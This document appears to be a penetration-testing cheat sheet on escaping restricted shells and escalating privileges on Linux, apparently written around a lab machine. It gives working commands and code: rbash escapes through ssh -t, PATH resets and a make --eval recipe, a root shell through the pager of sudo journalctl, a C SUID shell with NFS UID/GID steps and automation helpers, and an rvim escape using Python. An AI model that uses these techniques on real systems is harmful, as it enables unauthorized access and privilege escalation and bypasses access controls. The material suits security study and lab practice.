Jailbreaks

Escape rbash
  • It's possible to do it directly when connecting with ssh: -t forces a tty, and the command given after the host is run by the login shell with -c. rbash only refuses command names containing a slash, so a bare bash is accepted as long as it can be found through the jail's PATH:

ssh -i priv_key drno@10.10.10.124 -t bash
  • Or directly by changing the PATH. Note that rbash itself makes PATH read-only, so this only works when the "jail" is just a restricted PATH set from a profile rather than a real restricted shell:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  • It is also possible by using make (again, make must be reachable through the restricted PATH, since rbash rejects command names with a slash). First set a variable COMMAND with the value /bin/bash:

COMMAND='/bin/bash'
  • Then execute make in silent mode (-s) and let it evaluate the string x: as a makefile whose only recipe line is the shell. The recipe line must be tab-indented, and the leading - tells make to ignore the command's exit status. The recipe is executed by /bin/sh, which is not restricted:

make -s --eval=$'x:\n\t-'"$COMMAND"
  • Finish by fixing the PATH, because the new bash inherits the restricted one from rbash's environment:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
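The make escape as a small set of helper functions, added here as an example and not taken from the original page. It assumes GNU make is resolvable through the restricted PATH and that /bin/bash exists on the target; the function names are my own. Because the recipe runs under an unrestricted /bin/sh, the example sets PATH inside the recipe, so the spawned shell starts with a sane PATH and the separate "fix the PATH" step is not needed:

```shell
#!/bin/sh
# Added example, not part of the original page. Assumes GNU make is in the
# restricted PATH and /bin/bash exists (assumptions, not checks the page makes).

SANE_PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Returns 0 when the current bash is restricted (rbash or bash -r).  bash
# reports this as the 'r' flag in $- and as restricted_shell in $BASHOPTS;
# other shells have neither, so they count as unrestricted.
is_restricted_shell() {
    case "$-" in *r*) return 0 ;; esac
    case ":${BASHOPTS-}:" in *:restricted_shell:*) return 0 ;; esac
    return 1
}

# Prints the makefile fragment handed to --eval: a target "x" whose single
# recipe line starts the shell.  GNU make requires the recipe to be indented
# with a TAB, and the leading '-' makes make ignore the command's exit status.
# The recipe runs under /bin/sh, which is not restricted, so PATH can be set
# right there: the spawned shell then starts with SANE_PATH instead of the
# restricted PATH inherited from rbash.
make_eval_payload() {
    printf 'x:\n\t-PATH=%s %s\n' "$SANE_PATH" "${1:-/bin/bash}"
}

# Runs the escape.  make is invoked by bare name on purpose: rbash rejects
# command names that contain a slash.
escape_with_make() {
    command -v make >/dev/null 2>&1 || { echo "make is not in PATH" >&2; return 1; }
    make -s --eval="$(make_eval_payload "${1:-/bin/bash}")"
}
```

Run `is_restricted_shell && escape_with_make` from inside the jail; pass another program as the first argument to spawn something other than /bin/bash.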
sudo journalctl via less
  • journalctl writes to stdout if the output fits on the current screen, but hands it to the pager (less) if it doesn't.

  • When it is invoked with sudo, the pager runs as root too, so you get code execution as root just by typing ! followed by a command in less (for example !/bin/sh). less started with LESSSECURE=1 runs in secure mode and refuses the ! command, so check the environment if it does not work.

Escaping via NFS UID/GID Manipulation

Prerequisites

  • The NFS server must trust the UID/GID reported by the client (sec=sys, i.e. AUTH_SYS) and must not squash the IDs you need: no_all_squash (the default) is enough to impersonate an ordinary user such as UID 1000, while no_root_squash is required to impersonate root.

  • Access to a writable directory on the NFS share, from a host where you control the UID/GID you want to impersonate.

  • Ability to execute compiled binaries from the share on the target, i.e. the share is not mounted there with noexec or nosuid.

Exploit
#include <stdlib.h>
#include <unistd.h>

/* Run with SUID/SGID set, the effective UID/GID are already 1000.  The real
 * IDs are set as well because bash drops its effective privileges when they
 * differ from the real ones (unless it is started with -p). */
int main(void) {
    setreuid(1000, 1000);
    setregid(1000, 1000);
    system("/bin/bash");
    return 0;
}
Compile the exploit statically, so it does not depend on the target's libc:
gcc -static shell.c -o shell
Now copy the binary to the NFS share (mounted at /mnt on the attacking host) so that it ends up owned by UID/GID 1000, and set the SUID and SGID bits. With sec=sys the server records whatever UID/GID the client presents as the file owner, so copying it as a local user with UID 1000 is enough (root on the client could chown it only if the export has no_root_squash):
chmod ug+s /mnt/shell
Finally execute it on the target, where the share is mounted at /var/nfsshare, to get a shell as UID 1000:
/var/nfsshare/shell
  • The same technique escalates to root by making the file owned by UID/GID 0 with SUID/SGID set and using 0 in the setreuid/setregid calls. That requires the export to have no_root_squash, so that root on the client is not mapped to nobody; no_all_squash is the default and only leaves non-root IDs unmapped, so it is not enough on its own.
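The prerequisite checks above and the attacker-side preparation, written out as an added example that is not part of the original page. The function names, the mount point and the sample /etc/exports and /proc/mounts lines are constructed for the example and do not come from a real host:

```shell
#!/bin/sh
# Added example, not part of the original page.  Sample lines below are
# constructed; the hosts, paths and function names are assumptions.

# What you would read from the server's /etc/exports and from /proc/mounts
# on the target (constructed samples).
SAMPLE_EXPORT='/var/nfsshare 10.10.10.0/24(rw,sync,no_root_squash,no_subtree_check)'
SAMPLE_MOUNT='10.10.10.124:/var/nfsshare /var/nfsshare nfs4 rw,nosuid,relatime,vers=4.2,sec=sys,addr=10.10.10.124 0 0'

# export_has_option EXPORTS_LINE OPTION
# Returns 0 if OPTION is one of the comma-separated options inside the
# parentheses of an /etc/exports line.  Check no_root_squash when root is
# the goal: without it, client root is mapped to nobody and cannot create a
# root-owned SUID file on the share.
export_has_option() {
    opts=$(printf '%s\n' "$1" | sed -n 's/^[^(]*(\([^)]*\)).*/\1/p')
    case ",$opts," in *",$2,"*) return 0 ;; esac
    return 1
}

# mount_honours_suid PROC_MOUNTS_LINE
# Returns 0 if the mount options (4th field) contain neither nosuid nor
# noexec, i.e. the target kernel will run the binary and honour its bits.
mount_honours_suid() {
    flags=$(printf '%s\n' "$1" | awk '{print $4}')
    case ",$flags," in *,nosuid,*|*,noexec,*) return 1 ;; esac
    return 0
}

# mount_trusts_client_ids PROC_MOUNTS_LINE
# Returns 0 when the mount uses sec=sys (AUTH_SYS): the server then believes
# whatever UID/GID the client presents, which is what the technique relies
# on.  Kerberos flavours (sec=krb5, krb5i, krb5p) do not.
mount_trusts_client_ids() {
    flags=$(printf '%s\n' "$1" | awk '{print $4}')
    case ",$flags," in *,sec=sys,*) return 0 ;; esac
    return 1
}

# mount_share SERVER:/EXPORT MOUNTPOINT   (run as root on the attacking host)
mount_share() {
    mkdir -p "$2" && mount -t nfs "$1" "$2"
}

# place_suid_shell MOUNTPOINT BINARY
# Run this as the local user whose UID/GID you want on the target (a user
# with UID/GID 1000 for the page's example; root on a no_root_squash export
# for the root variant).  With sec=sys the server stores the client's
# UID/GID as the owner of the new file, so no chown is needed.
place_suid_shell() {
    cp "$2" "$1/shell" || return 1
    chmod 6755 "$1/shell"   # rwsr-sr-x: SUID + SGID, executable by everyone
}
```

Typical use: `export_has_option "$(grep nfsshare /etc/exports)" no_root_squash` on the server, `mount_honours_suid "$(grep nfsshare /proc/mounts)"` on the target, then `mount_share 10.10.10.124:/var/nfsshare /mnt` as root and `place_suid_shell /mnt ./shell` as the impersonated user on the attacking host.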

Escape rvim
  • Run rvim (sudo hijack example: the shell you spawn will run as the user sudo switched to, here adm):

sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
  • And spawn the shell. Restricted mode disables the shell commands (:! and :shell) but not the scripting interfaces, so if this vim build has Python support, os.execl replaces the editor process with a shell:
:py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
